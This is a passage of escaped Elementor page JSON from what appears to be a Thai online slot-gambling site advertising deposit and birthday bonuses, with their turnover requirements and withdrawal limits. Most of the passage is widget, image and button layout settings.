\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e36\\u0e07\\u0e08\\u0e32\\u0e01 AMB18 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e40\\u0e15\\u0e34\\u0e21\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e44\\u0e14\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e16\\u0e21\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e4a\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e21\\u0e14\\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e38\\u0e01 \\u0e46 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e15\\u0e32\\u0e21\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e1b\\u0e35\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e32\\u0e15\\u0e4c \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e14\\u0e39\\u0e04\\u0e38\\u0e49\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e2b\\u0e32\\u0e22\\u0e2b\\u0e48\\u0e27\\u0e07\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e44\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33 \\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e1a\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e2d\\u0e47\\u0e19\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e17\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e41\\u0e15\\u0e48\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e08\\u0e30\\u0e1b\\u0e31\\u0e07\\u0e41\\u0e04\\u0e48\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e25\\u0e37\\u0e21\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e04\\u0e39\\u0e48\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-Yok789.webp\",\"id\":281,\"size\":\"\",\"alt\":\"20 get 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-Yok789.webp\",\"id\":282,\"size\":\"\",\"alt\":\"79 get 200\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-Yok789.webp\",\"id\":279,\"size\":\"\",\"alt\":\"Bonus free 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Bonus-Banner-Yok789.webp\",\"id\":275,\"size\":\"\",\"alt\":\"HBD Bonus\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" 